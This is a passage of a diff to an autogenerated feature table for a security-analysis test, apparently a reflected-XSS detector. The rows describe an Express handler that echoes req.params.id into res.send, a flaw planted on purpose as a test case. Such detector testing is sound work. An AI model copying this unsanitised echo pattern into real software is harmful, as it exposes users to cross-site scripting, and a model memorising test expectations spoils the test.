+135953,56 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | functio ... JSON\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | functio ... JSON\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | functio ... JSON\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | return of anonymous function | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:32:25:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:37:25:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:5 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:5 | res | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:15 | res.writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:15 | res.writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:15 | res.writeHead | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:15 | res.writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:15 | res.writeHead | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | exceptional return of res.wri ... json'}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | exceptional return of res.wri ... json'}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | exceptional return of res.wri ... json'}) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | exceptional return of res.wri ... json'}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | exceptional return of res.wri ... json'}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | res.wri ... json'}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | res.wri ... json'}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | res.wri ... json'}) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | res.wri ... json'}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:3:26:58 | res.wri ... json'}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:7:26:15 | writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:7:26:15 | writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:7:26:15 | writeHead | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:7:26:15 | writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:7:26:15 | writeHead | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:17:26:19 | 200 | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:17:26:19 | 200 | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:17:26:19 | 200 | contextFunctionInterfaces | textContentType() | @@ -20445,6 +136019,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:22:26:57 | {'Conte ... /json'} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:22:26:57 | {'Conte ... /json'} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:22:26:57 | {'Conte ... /json'} | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:36 | 'Content-Type' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:36 | 'Content-Type' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:36 | 'Content-Type' | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:36 | 'Content-Type' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:36 | 'Content-Type' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:23:26:56 | 'Conten ... n/json' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:39:26:56 | 'application/json' | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:39:26:56 | 'application/json' | InputAccessPathFromCallee | 1.Content-Type | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:39:26:56 | 'application/json' | InputArgumentIndex | 1 | @@ -20454,6 +136043,42 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:39:26:56 | 'application/json' | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:39:26:56 | 'application/json' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:26:39:26:56 | 'application/json' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:27:7:27:14 | whatever | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:27:7:27:14 | whatever | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:27:7:27:14 | whatever | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:27:7:27:14 | whatever | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:27:7:27:14 | whatever | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:7 | res | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:12 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:12 | res.send | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:12 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | res.sen ... ams.id) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:5:28:37 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:9:28:12 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:9:28:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:9:28:12 | send | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:9:28:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:9:28:12 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:20 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:20 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:20 | "FOO: " | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:20 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:20 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:20 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:36 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:36 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:36 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20462,6 +136087,63 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:36 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:36 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:14:28:36 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:26 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:26 | req | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:33 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:33 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:33 | req.params | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:33 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:33 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:36 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:36 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:36 | req.params.id | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:36 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:36 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:24:28:36 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:28:28:33 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:28:28:33 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:28:28:33 | params | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:28:28:33 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:28:28:33 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:35:28:36 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:35:28:36 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:35:28:36 | id | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:35:28:36 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:28:35:28:36 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:7 | res | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:12 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:12 | res.send | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:12 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | res.sen ... ams.id) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:5:30:37 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:9:30:12 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:9:30:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:9:30:12 | send | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:9:30:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:9:30:12 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:20 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:20 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:20 | "FOO: " | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:20 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:20 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:20 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:36 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:36 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:36 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20470,6 +136152,63 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:36 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:36 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:14:30:36 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:26 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:26 | req | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:33 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:33 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:33 | req.params | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:33 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:33 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:36 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:36 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:36 | req.params.id | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:36 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:36 | 